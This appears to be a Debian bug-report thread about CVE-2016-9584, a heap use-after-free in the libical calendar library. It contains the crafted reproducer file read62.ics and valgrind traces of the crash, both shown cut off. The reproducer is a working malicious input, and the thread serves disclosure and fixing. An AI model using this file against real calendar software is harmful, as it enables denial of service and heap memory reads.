Bug#852034: libical: CVE-2016-9584: heap use-after-free

[Salvatore Bonaccorso]

Hi

Since it looks that
http://www.openwall.com/lists/oss-security/2017/01/20/16 it's fine to
attach the reproducer, attached is the original read62.ics from
Augustin Mista.

Regards,
Salvatore
BEGIN:VCALENDAR
VERSION;a=;b="a","a";c="a","b":2.1
PRODID:b
CALSCALE:c
b;b=;b="a";a=:
BEGIN:VTIMEZONE
TZID;b="c","c";a="c","c":a
LAST-MODIFIED:18640512T154526Z
TZURL;b=;b=:×YÌw
b;b="a":
c;a="a","c";b="a":
c:

c:

END:VTIMEZONE
BEGIN:VEVENT
DTSTAMP:18640509T123415Z
UID:a
CLASS;a=:PRIVATE
GEO;c=:5.243332;-30.705524
LAST-MODIFIED:18640509T001303Z
LOCATION;LANGUAGE="a";c="b","a":c
ORGANIZER;DIR="3¥//×";SENT-BY="+//+Gv€F»";LANGUAGE="b";a="a":w//mºÃ
 –‡
PRIORITY:-3
SEQUENCE:-3
STATUS:CONFIRMED
SUMMARY;ALTREP="h//o`R&^";LANGUAGE="c";b=;a="a","b":b
TRANSP;a="a","b":TRANSPARENT
URL;a=;a="b","c":H_õGD
RECURRENCE-ID:18640510T142133
RRULE:FREQ=MINUTELY;BYSECOND=0,0;BYMINUTE=0;BYHOUR=0,0;BYDAY=0MO;BYMONTHDAY
 =0;BYYEARDAY=0,0,0;BYMONTH=0,0,0;BYSETPOS=0,0,0;WKST=SU
RRULE;a=;c=:FREQ=HOURLY;COUNT=-2;INTERVAL=-2;BYSECOND=0,0;BYMINUTE=0,0;BYHO
 UR=0;BYDAY=0TH;BYMONTHDAY=0,0,0;BYYEARDAY=0,0;BYMONTH=0,0;WKST=WE
RRULE:FREQ=DAILY;BYMINUTE=0,0;BYDAY=MO;BYMONTHDAY=0,0,0;BYYEARDAY=0,0;BYWEE
 KNO=0,0;BYSETPOS=0,0;WKST=TH
RRULE;a=:FREQ=MONTHLY;COUNT=2;INTERVAL=2;BYMINUTE=0,0;BYYEARDAY=0;BYWEEKNO=
 0,0;BYSETPOS=0;WKST=WE
ATTACH:Nu//M
ATTACH;FMTTYPE=application/b;a="c":E//
?OF
ATTACH;b=;c=;VALUE=BINARY;ENCODING=BASE64:AAEA
ATTENDEE;CUTYPE=RESOURCE;MEMBER=",//;ei	";ROLE="c";RSVP=TRUE;DELEGATED-TO="
 L//N";DELEGATED-FROM="//R1","4//|sO","	//o[²";CN="a";DIR="WÍ//|<cm
 MD";a=;b="c":uK2
ATTENDEE;CUTYPE="c";MEMBER="	//xh5","RÓ//u7";ROLE=OPT-PARTICIPANT;PARTST
 AT=COMPLETED;RSVP=TRUE;DELEGATED-TO="s//·L
w1","®,OÒ";DELEGATED-FROM="
 ¤//3„"1";SENT-BY="}//!@ý_¯";CN="b";LANGUAGE="b";a="c","c";b="a","
 b":n[//½2¡
CATEGORIES;LANGUAGE="b":a
CATEGORIES;LANGUAGE="c":c
COMMENT;ALTREP="gi//À?¨3o";c="b";b=:a
COMMENT;a="c":c
COMMENT;ALTREP="//üÏ]¡";a="b";c="a","a":c
EXDATE;VALUE=DATE;a=;a="a":
EXDATE;VALUE=DATE;a="a":
REQUEST-STATUS;c=;a="a","c":0;c;c
REQUEST-STATUS;LANGUAGE="a":0.0;a;a
RELATED-TO;c="c","b";a=;RELTYPE="b":a
RELATED-TO:c
RDATE;VALUE=DATE;b="b";a="c","c":18640511
RDATE;VALUE=PERIOD;c=:18640509T110241/PT-1H1M1S
BEGIN:VALARM
ACTION;c="c","c";b="c":AUDIO
TRIGGER;VALUE=DATE-TIME:18640511T160521Z
REPEAT:1
DURATION;a=:-P-1W
ATTACH;VALUE=BINARY;ENCODING=BASE64:
c:

END:VALARM
BEGIN:VALARM
ACTION:DISPLAY
TRIGGER:PT1H-1M1S
DESCRIPTION;ALTREP="//u";LANGUAGE="b";a=:a
REPEAT:1
a;b=:
c;c=:
END:VALARM
BEGIN:VALARM
ACTION:EMAIL
TRIGGER;a="b";VALUE=DATE-TIME:18640511T010525Z
DESCRIPTION;ALTREP="L//";LANGUAGE="c":c
SUMMARY;ALTREP="Õ//8";LANGUAGE="c":b
ATTENDEE;CUTYPE=RESOURCE;ROLE=NON-PARTICIPANT;PARTSTAT=DELEGATED;RSVP=TRUE;
 DELEGATED-TO="//v",">s";SENT-BY="â";DIR="//j*"://ñ
ATTENDEE;CUTYPE=GROUP;MEMBER="X";PARTSTAT="a";RSVP=TRUE;DELEGATED-TO="//«
 ’","C//lz";DELEGATED-FROM="=//*-F";SENT-BY="h#";DIR="o//Ýl";LANGUAGE="a
 ":2//tk+
REPEAT:-1
DURATION:P1DT1H-1M-1S
ATTACH;a=;VALUE=BINARY;ENCODING=BASE64:AQE=
ATTACH;FMTTYPE=video/b;c=;VALUE=BINARY;ENCODING=BASE64:AQ==
a;a=:
b;b="b":

a:
END:VALARM
b;b="a":


b;a="c","c";c="a","c":

END:VEVENT
BEGIN:VEVENT
DTSTAMP;a="a":18640508T112617Z
UID;b="b";b="a":b
DTSTART;TZID="a";b="b";a=:18640508T060217
CLASS;a="a":CONFIDENTIAL
CREATED:18640508T060348Z
DESCRIPTION;ALTREP="£";LANGUAGE="c";b="c":b
GEO;a="a":-21.932919;0.126901
LAST-MODIFIED;a=:18640507T100353Z
ORGANIZER;DIR="
ATTENDEE;CUTYPE="c";ROLE=OPT-PARTICIPANT;DELEGATED-FROM="// ";SENT-BY="cD
 ü";DIR="P//":O//
REPEAT;c="c":-2
DURATION;b=:P0DT-1H-1M0S
a;c="c":

END:VALARM
END:VEVENT
BEGIN:VEVENT
DTSTAMP;a=:18640508T231357Z
UID;b=;c="b","a":a
DTSTART;TZID="c";c="c","c";a=:18640507T212203
CLASS;b=:c
CREATED;c=:18640507T224453Z
DESCRIPTION;ALTREP="//A1r1";a="c","a":c
GEO:2.636681;-2.271918
LAST-MODIFIED;c="c","c":18640506T095808Z
LOCATION;b="c";b="b","a":b
ORGANIZER;CN="a";DIR="VÿF";SENT-BY="c
Óï";LANGUAGE="b";b="a";a="a"
 :—t
PRIORITY;a="c":0
SEQUENCE:-1
STATUS;a="a","a";b="c":CANCELLED
TRANSP;b=;a="c":OPAQUE
URL;b=;a="a":,‚//(
RRULE;b="b","a":FREQ=MINUTELY;UNTIL=18640510T061434Z;INTERVAL=0;BYSECOND=0,
 0;BYMINUTE=0,0;BYHOUR=0;BYDAY=MO,0TU,WE;BYMONTHDAY=0;BYYEARDAY=0,0;BYWEEKN
 O=0,0,0;BYSETPOS=0,0;WKST=TU
RRULE;c="c","b";c="b":FREQ=MONTHLY;INTERVAL=-2;BYSECOND=0,0;BYHOUR=0;BYDAY=
 0SA,0WE;BYMONTH=0;BYSETPOS=0,0
RRULE;c="a":FREQ=MONTHLY;BYMINUTE=0,0,0;BYDAY=TH,0FR;BYMONTHDAY=0,0,0;BYWEE
 KNO=0,0,0;BYMONTH=0,0;BYSETPOS=0;WKST=FR
RRULE;c=:FREQ=YEARLY;COUNT=2;INTERVAL=-2;BYSECOND=0,0,0;BYHOUR=0,0,0;BYDAY=
 0SA,TU,TH;BYMONTHDAY=0,0,0;BYYEARDAY=0,0;BYWEEKNO=0,0;BYMONTH=0,0;BYSETPOS
 =0
ATTACH;FMTTYPE=c/b;b=;VALUE=BINARY;ENCODING=BASE64:AQA=
ATTENDEE;CUTYPE=GROUP;MEMBER="eú//#åW'n","§
//[áêl4j";RSVP=TRUE;DELE
 GATED-TO="3\¾=";SENT-BY="_//V";CN="a";DIR="x//QZ:,";LANGUAGE="c";c="a"
 ,"a";c=://!g
ATTENDEE;CUTYPE=ROOM;MEMBER="//zv^";ROLE=NON-PARTICIPANT;PARTSTAT=ACCEPTED;
 

Bug#852034: libical: CVE-2016-9584: heap use-after-free

[Salvatore Bonaccorso]

Source: libical
Version: 1.0-1.3
Severity: important
Tags: security upstream

Hi,

the following vulnerability was published for libical.

CVE-2016-9584[0]:
| libical allows remote attackers to cause a denial of service
| (use-after-free) and possibly read heap memory via a crafted ics file.

The SuSE bugzilla entry contains a helper paerser which can be used to
trigger the issue, with the read62.ics provided by Agustin Mista (but
it is not public, and needs to be requested to Agustin Mista
currently, should ideally be made public by the reporter though).

The issue is then reproducible under valgrind with both 1.0-1.3 and
2.0.0-0.5.

==956== Memcheck, a memory error detector
==956== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
==956== Using Valgrind-3.12.0 and LibVEX; rerun with -h for copyright info
==956== Command: ./icaltestparser ./read62.ics
==956== 
==956== Invalid read of size 1
==956==at 0x4C2EDA2: strlen (vg_replace_strmem.c:454)
==956==by 0x50F3DA2: vfprintf (vfprintf.c:1637)
==956==by 0x51A1975: __vsnprintf_chk (vsnprintf_chk.c:63)
==956==by 0x51A18D7: __snprintf_chk (snprintf_chk.c:34)
==956==by 0x4E7D66A: icalreqstattype_as_string_r (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x4E7E559: icalvalue_as_ical_string_r (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x4E7186A: icalproperty_as_ical_string_r (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x4E6AA67: icalcomponent_as_ical_string_r (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x4E6AAB7: icalcomponent_as_ical_string_r (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x4E6AB75: icalcomponent_as_ical_string (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x108B95: main (icaltestparser.c:117)
==956==  Address 0x849c2a4 is 4 bytes inside a block of size 66 free'd
==956==at 0x4C2CDDB: free (vg_replace_malloc.c:530)
==956==by 0x4E70059: icalparser_add_line (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x108B7E: main (icaltestparser.c:112)
==956==  Block was alloc'd at
==956==at 0x4C2DBC5: calloc (vg_replace_malloc.c:711)
==956==by 0x4E6E1AD: icalmemory_new_buffer (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x4E6F165: ??? (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x4E700A4: icalparser_add_line (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x108B7E: main (icaltestparser.c:112)
==956== 
==956== Invalid read of size 1
==956==at 0x4C2EDB4: strlen (vg_replace_strmem.c:454)
==956==by 0x50F3DA2: vfprintf (vfprintf.c:1637)
==956==by 0x51A1975: __vsnprintf_chk (vsnprintf_chk.c:63)
==956==by 0x51A18D7: __snprintf_chk (snprintf_chk.c:34)
==956==by 0x4E7D66A: icalreqstattype_as_string_r (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x4E7E559: icalvalue_as_ical_string_r (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x4E7186A: icalproperty_as_ical_string_r (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x4E6AA67: icalcomponent_as_ical_string_r (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x4E6AAB7: icalcomponent_as_ical_string_r (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x4E6AB75: icalcomponent_as_ical_string (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x108B95: main (icaltestparser.c:117)
==956==  Address 0x849c2a5 is 5 bytes inside a block of size 66 free'd
==956==at 0x4C2CDDB: free (vg_replace_malloc.c:530)
==956==by 0x4E70059: icalparser_add_line (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x108B7E: main (icaltestparser.c:112)
==956==  Block was alloc'd at
==956==at 0x4C2DBC5: calloc (vg_replace_malloc.c:711)
==956==by 0x4E6E1AD: icalmemory_new_buffer (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x4E6F165: ??? (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x4E700A4: icalparser_add_line (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x108B7E: main (icaltestparser.c:112)
==956== 
==956== Invalid read of size 1
==956==at 0x4C330A8: __GI_mempcpy (vg_replace_strmem.c:1518)
==956==by 0x511FBFD: _IO_default_xsputn (genops.c:438)
==956==by 0x50F3BDA: vfprintf (vfprintf.c:1637)
==956==by 0x51A1975: __vsnprintf_chk (vsnprintf_chk.c:63)
==956==by 0x51A18D7: __snprintf_chk (snprintf_chk.c:34)
==956==by 0x4E7D66A: icalreqstattype_as_string_r (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x4E7E559: icalvalue_as_ical_string_r (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x4E7186A: icalproperty_as_ical_string_r (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x4E6AA67: icalcomponent_as_ical_string_r (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by 0x4E6AAB7: icalcomponent_as_ical_string_r (in 
/usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==by